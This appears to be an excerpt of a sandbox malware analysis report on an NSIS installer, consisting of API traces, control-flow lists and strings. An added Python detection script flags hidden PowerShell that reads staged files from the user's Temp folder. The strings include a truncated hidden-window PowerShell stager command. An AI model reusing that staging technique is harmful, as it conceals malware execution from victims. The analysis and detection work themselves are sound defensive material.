                                                                            • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\order CF08093-24.exe",00000020,"C:\Users\user\Desktop\order CF08093-24.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                            • wsprintfW.USER32 ref: 0040399B
                                                                            • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                                            • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                                              • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                            • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                              • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                              • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                            • ExitProcess.KERNEL32 ref: 00403A89
                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                            • ExitProcess.KERNEL32 ref: 00403B33
                                                                              • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                            • String ID:
                                                                              • "C:\Users\user\Desktop\order CF08093-24.exe"
                                                                              • 1033
                                                                              • C:\Users\user\AppData\Local\Temp\
                                                                              • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                                                              • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes
                                                                              • C:\Users\user\Desktop
                                                                              • Error launching installer
                                                                              • Low
                                                                              • NSIS Error
                                                                              • SeShutdownPrivilege
                                                                              • TEMP
                                                                              • TMP
                                                                              • UXTHEME
                                                                              • \Temp
                                                                              • powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm
                                                                              • ~nsu%X.tmp
                                                                            • API String ID: 1813718867-2140108915
                                                                            • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                            • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                            • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                            • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
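The function above is the installer's main routine: it rewrites TEMP and TMP with SetEnvironmentVariableW, copies a file into the Temp directory with CopyFileW, spawns a process through the subcall at 00405B24 (CreateProcessW), and its string table carries a `powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw '…'` command line, which is the behaviour behind the report's "Suspicious powershell command line found" signature. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It is a detection check over process-creation events that alerts when a PowerShell child is started with a hidden window and reads a staged file under the user's Temp directory with `gc -raw`. The event records are constructed Sysmon-style dictionaries: the file name `stage.txt`, the SysWOW64 PowerShell path and the two benign events are assumptions made for the test data, not values from the report.

```python
import re

# Detection check for the pattern in the string table above: an installer in a
# user profile folder launches powershell.exe with a hidden window and a
# "gc -raw '<file under %TEMP%>'" command line. Added example, not from the report.

POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe"}


def _prefixes(word):
    """Regex alternation of every prefix of word, longest first.
    powershell.exe accepts any unambiguous prefix of -WindowStyle (-w, -win, ...)."""
    return "|".join(word[:i] for i in range(len(word), 0, -1))


HIDDEN_WINDOW_RE = re.compile(r"-(?:" + _prefixes("windowstyle") + r")\s+hidden\b", re.IGNORECASE)

# gc is an alias of Get-Content (cat and type are aliases too); -Raw reads the whole
# file as one string, which is how a staged payload is pulled into a variable.
READ_STAGE_RE = re.compile(r"\b(?:gc|cat|type|get-content)\s+-r(?:aw)?\s+'([^']+)'", re.IGNORECASE)

USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
USER_PROFILE_EXE_RE = re.compile(r"\\Users\\[^\\]+\\(?:Desktop|Downloads)\\[^\\]+\.exe$", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def staged_file(cmdline):
    """Path read with gc/cat/type -raw from the command line, or None."""
    m = READ_STAGE_RE.search(cmdline)
    return m.group(1) if m else None


def classify(event):
    """Return the reasons an event matches; empty list when nothing matches."""
    reasons = []
    if basename(event.get("Image", "")) not in POWERSHELL_NAMES:
        return reasons
    cmd = event.get("CommandLine", "")
    if HIDDEN_WINDOW_RE.search(cmd):
        reasons.append("hidden window")
    path = staged_file(cmd)
    if path is not None and USER_TEMP_RE.search(path):
        reasons.append("reads staged file from user Temp")
    if USER_PROFILE_EXE_RE.search(event.get("ParentImage", "")):
        reasons.append("parent is an executable in Desktop/Downloads")
    return reasons


def is_suspicious(event):
    """Alert only on the combination; a hidden window alone is common in admin scripts."""
    reasons = classify(event)
    return "hidden window" in reasons and "reads staged file from user Temp" in reasons


def scan(events):
    """Indices of the events that should raise an alert."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]


# CONSTRUCTED sample events (Sysmon Event ID 1 style). Only the first follows the
# report's strings; its file name "stage.txt" is a placeholder, not a reported value.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\Desktop\order CF08093-24.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw '
                       + r"'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\stage.txt'"
                       + '"',
    },
    {   # benign scheduled script: visible window, script from a fixed location
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {   # hidden window but no staged file: one reason recorded, no alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -w hidden -c "Get-Date"',
    },
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(i, classify(SAMPLE_EVENTS[i]), staged_file(SAMPLE_EVENTS[i]["CommandLine"]))
```

Run it directly and it prints the index of the flagged event, its reasons and the staged path. `is_suspicious` deliberately requires both the hidden window and the Temp-directory read so that ordinary hidden maintenance scripts do not alert, while `classify` keeps every individual reason for triage; the parent-in-Desktop/Downloads reason is recorded but not required, because the same stager could be launched from a Downloads folder or an archive extraction path.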

                                                                            Control-flow Graph (text edge list: `node start-end [API calls]`, `a->b` is an edge)
                                                                            control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 174 40580b-40580e 152->174 175 4057ef-405809 SendMessageW * 2 152->175 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 163 405917-40591d 158->163 164 40596b-40596f 158->164 161 405930-405939 call 404527 159->161 162 4058f7-405906 ShowWindow * 2 call 4044f5 159->162 171 40593e-405942 161->171 162->158 169 405945-405955 ShowWindow 163->169 170 40591f-40592b call 404499 163->170 164->161 167 405971-405977 164->167 167->161 176 405979-40598c SendMessageW 167->176 172 405965-405966 call 404499 169->172 173 405957-405960 call 4055c6 169->173 170->161 172->164 173->172 180 405810-40581c SendMessageW 174->180 181 40581e-405835 call 4044c0 174->181 175->174 182 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 176->182 183 405a8e-405a90 176->183 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188 4059d2-4059e7 TrackPopupMenu 182->188 189 4059bf-4059cf GetWindowRect 182->189 183->171 188->183 193 4059ed-405a04 188->193 189->188 194 40585a 190->194 195 40584d-405858 ShowWindow 190->195 191->183 192 405892-4058aa SendMessageW * 2 191->192 192->183 196 405a09-405a24 SendMessageW 193->196 197 405860-405866 call 4044f5 194->197 195->197 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                            • GetClientRect.USER32(?,?), ref: 004057AF
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                            • ShowWindow.USER32(00000000), ref: 004058FE
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                            • ShowWindow.USER32(00000008), ref: 0040594D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                            • CreatePopupMenu.USER32 ref: 00405992
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                            • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                            • EmptyClipboard.USER32 ref: 00405A2D
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                            • CloseClipboard.USER32 ref: 00405A88
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the function above)
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                            • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                            • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                            • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

                                                                            Control-flow Graph (text edge list: `node start-end [API calls]`, `a->b` is an edge)
                                                                            control_flow_graph 667 406c5f-406c64 668 406cd5-406cf3 667->668 669 406c66-406c95 667->669 670 4072cb-4072e0 668->670 671 406c97-406c9a 669->671 672 406c9c-406ca0 669->672 675 4072e2-4072f8 670->675 676 4072fa-407310 670->676 677 406cac-406caf 671->677 673 406ca2-406ca6 672->673 674 406ca8 672->674 673->677 674->677 678 407313-40731a 675->678 676->678 679 406cb1-406cba 677->679 680 406ccd-406cd0 677->680 684 407341-40734d 678->684 685 40731c-407320 678->685 681 406cbc 679->681 682 406cbf-406ccb 679->682 683 406ea2-406ec0 680->683 681->682 688 406d35-406d63 682->688 686 406ec2-406ed6 683->686 687 406ed8-406eea 683->687 694 406ae3-406aec 684->694 689 407326-40733e 685->689 690 4074cf-4074d9 685->690 692 406eed-406ef7 686->692 687->692 695 406d65-406d7d 688->695 696 406d7f-406d99 688->696 689->684 693 4074e5-4074f8 690->693 698 406ef9 692->698 699 406e9a-406ea0 692->699 697 4074fd-407501 693->697 700 406af2 694->700 701 4074fa 694->701 702 406d9c-406da6 695->702 696->702 721 407481-40748b 698->721 722 406e7f-406e97 698->722 699->683 710 406e3e-406e48 699->710 706 406af9-406afd 700->706 707 406c39-406c5a 700->707 708 406b9e-406ba2 700->708 709 406c0e-406c12 700->709 701->697 703 406dac 702->703 704 406d1d-406d23 702->704 727 406d02-406d1a 703->727 728 407469-407473 703->728 717 406dd6-406ddc 704->717 718 406d29-406d2f 704->718 706->693 714 406b03-406b10 706->714 707->670 712 406ba8-406bc1 708->712 713 40744e-407458 708->713 715 406c18-406c2c 709->715 716 40745d-407467 709->716 719 40748d-407497 710->719 720 406e4e-407017 710->720 723 406bc4-406bc8 712->723 713->693 714->701 726 406b16-406b5c 714->726 729 406c2f-406c37 715->729 716->693 724 406e3a 717->724 725 406dde-406dfc 717->725 718->688 718->724 719->693 720->694 721->693 722->699 723->708 731 406bca-406bd0 723->731 724->710 732 406e14-406e26 725->732 733 406dfe-406e12 725->733 734 406b84-406b86 726->734 735 406b5e-406b62 726->735 727->704 
                                                                            728->693 729->707 729->709 736 406bd2-406bd9 731->736 737 406bfa-406c0c 731->737 738 406e29-406e33 732->738 733->738 741 406b94-406b9c 734->741 742 406b88-406b92 734->742 739 406b64-406b67 GlobalFree 735->739 740 406b6d-406b7b GlobalAlloc 735->740 743 406be4-406bf4 GlobalAlloc 736->743 744 406bdb-406bde GlobalFree 736->744 737->729 738->717 745 406e35 738->745 739->740 740->701 746 406b81 740->746 741->723 742->741 742->742 743->701 743->737 744->743 748 407475-40747f 745->748 749 406dbb-406dd3 745->749 746->734 748->693 749->717
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed for the first function above)
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                            • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                            • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                            • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                                            Control-flow Graph (rendered graph not reproduced): basic blocks 40689e-4068c2, calling FindFirstFileW and FindClose
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                            • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: X_B
                                                                            • API String ID: 2295610775-941606717
                                                                            • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                            • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                            • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                            • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

                                                                            Control-flow Graph (rendered graph not reproduced): basic blocks 403fc1-404496, the dialog procedure passed to DialogBoxParamW
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                            • ShowWindow.USER32(?), ref: 0040401D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                            • DestroyWindow.USER32 ref: 0040405C
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                            • GetDlgItem.USER32(?,?), ref: 00404094
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                            • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                            • EnableWindow.USER32(?,?), ref: 004042C3
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                            • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                            • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                            • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 121052019-0
                                                                            • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                            • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                            • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                            • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                                            Control-flow Graph (rendered graph not reproduced): basic blocks 403c13-403ee8, window class registration and dialog creation
                                                                            APIs
                                                                              • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                              • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                            • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\order CF08093-24.exe",00008001), ref: 00403C94
                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403D14
                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                            • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                            • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                            • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-2419641765
                                                                            • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                            • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                            • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                            • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                                            Control-flow Graph (rendered graph not reproduced): basic blocks 4030a2-4032d6, installer self-read and integrity check
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004030B3
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
